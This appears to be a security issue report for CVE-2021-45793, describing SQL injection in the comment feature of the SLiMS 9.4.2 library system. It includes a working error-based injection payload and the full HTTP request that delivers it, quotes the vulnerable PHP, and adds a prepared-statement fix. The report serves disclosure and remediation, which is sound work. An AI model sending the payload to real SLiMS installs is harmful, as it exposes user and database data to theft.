# CVE-2021-45793: [Security Bugs] Sql Injection · Issue #123 · slims/slims9_bulian
Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.

SQL injection exists in the lib/comment.inc.php file. There is no effective defense on the comment field, leading to SQL injection attacks.

An ordinary logged-in user, via “find a book”, can perform the SQL injection through the comments (example: `'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1`).
SQL injection request:

```http
POST /index.php?p=show_detail&id=17 HTTP/1.1
Host: 192.168.31.63
Content-Length: 110
Cache-Control: max-age=0
Origin: http://192.168.31.63
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.9
Referer: http://192.168.31.63/index.php?p=show_detail&id=17
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9
Connection: close

comment='and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1&SaveComment=Save+comment
```
Vulnerable code:

```php
// lib/comment.inc.php as posted in the report (SLiMS 9.4.2). The HTML markup inside
// the string literals was lost when the issue was rendered; string boundaries and
// newlines are kept as posted. Note that $_detail_id is concatenated straight into
// the query text instead of being passed as a bound parameter.
$_sql = "Select c.comment, m.member_name, c.input_date from comment AS c
    LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
    LEFT JOIN member AS m ON m.member_id = c.member_id
    WHERE b.biblio_id = " . $_detail_id . " ORDER BY c.last_update DESC";
$commlist = $dbs->query($_sql);
if ($commlist) {
    $_all_recs = $commlist->num_rows;
}
if ($_all_recs > 0) {
    $_page = ($page - 1) * $_recs_each_page;
    $_sql .= " LIMIT " . $_page . ", " . $_recs_each_page;
    $commlist = $dbs->query($_sql);
    $_list_comment .= '
        ' . $_all_recs . __(' comments available') . '
        ';
    while ($_data = $commlist->fetch_assoc()) {
        $_list_comment .= '
            ';
        $_list_comment .= '
            ' . $_data['member_name'] . __(' at') . $_data['input_date'] . __(' write') . '</div>';
        $_list_comment .= '
            ' . $_data['comment'] . '
            ';
        $_list_comment .= '
            ';
    }
    $_list_comment .= '
        ' . simbio_paging::paging($_all_recs, $_recs_each_page, $int_pages_each_set = 10, '', '_self') . '
        ';
}
if (isset($_SESSION['mid'])) {
    // Comment form
    $_forms = '
        ';
    $_forms .= simbio_form_element::textField('textarea', 'comment', '', 'placeholder="Add your comment" class="comment-input form-control"') . '
        ';
    $_forms .= '';
    $_forms .= \Volnix\CSRF\CSRF::getHiddenInputString();
    $_forms .= '';
}
return $_list_comment . $_forms;
```
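As an added example (not SLiMS code and not the fix the project shipped), the same comment listing plus the comment save handler rewritten with mysqli prepared statements, so the biblio id, paging values and the comment text travel as bound parameters instead of being spliced into the SQL string. It assumes `$dbs` is a `mysqli` connection as in the snippet above, that mysqlnd is available for `get_result()`, that the comment table has the columns the vulnerable query reads, and that the volnix/csrf library exposes `CSRF::validate()` to check the hidden field the form emits.

```php
<?php
// Added example, not SLiMS code. Assumptions: $dbs is a mysqli connection, mysqlnd
// provides get_result(), and the comment table has biblio_id, member_id, comment,
// input_date and last_update (the columns the vulnerable query reads).

// Listing: biblio_id, offset and page size are bound as integers, never concatenated.
function listComments(mysqli $dbs, int $biblioId, int $page, int $perPage): array
{
    $offset = max(0, ($page - 1) * $perPage);
    $stmt = $dbs->prepare(
        'SELECT c.comment, m.member_name, c.input_date FROM comment AS c
           LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
           LEFT JOIN member AS m ON m.member_id = c.member_id
          WHERE b.biblio_id = ?
          ORDER BY c.last_update DESC
          LIMIT ?, ?'
    );
    $stmt->bind_param('iii', $biblioId, $offset, $perPage);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Saving: the textarea content is bound as a string, so a payload like the one in the
// report is stored as literal text and never parsed as SQL. CSRF::validate() is assumed.
function saveComment(mysqli $dbs, int $biblioId, int $memberId, string $comment): bool
{
    if (!\Volnix\CSRF\CSRF::validate($_POST)) {
        return false;
    }
    $comment = trim($comment);
    if ($comment === '' || mb_strlen($comment) > 2000) {   // 2000 is an arbitrary cap
        return false;
    }
    $stmt = $dbs->prepare(
        'INSERT INTO comment (biblio_id, member_id, comment, input_date, last_update)
         VALUES (?, ?, ?, NOW(), NOW())'
    );
    $stmt->bind_param('iis', $biblioId, $memberId, $comment);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Wiring for the show_detail page: the record id from the query string is cast to int.
if (isset($_SESSION['mid'], $_POST['SaveComment'], $_POST['comment'])) {
    saveComment($dbs, (int) $_GET['id'], (int) $_SESSION['mid'], (string) $_POST['comment']);
}
```

With the comment bound as a parameter, the `updatexml(...)` string from the report is stored verbatim and the listing query simply echoes it back as text, so the `XPATH syntax error` channel the payload relies on never opens.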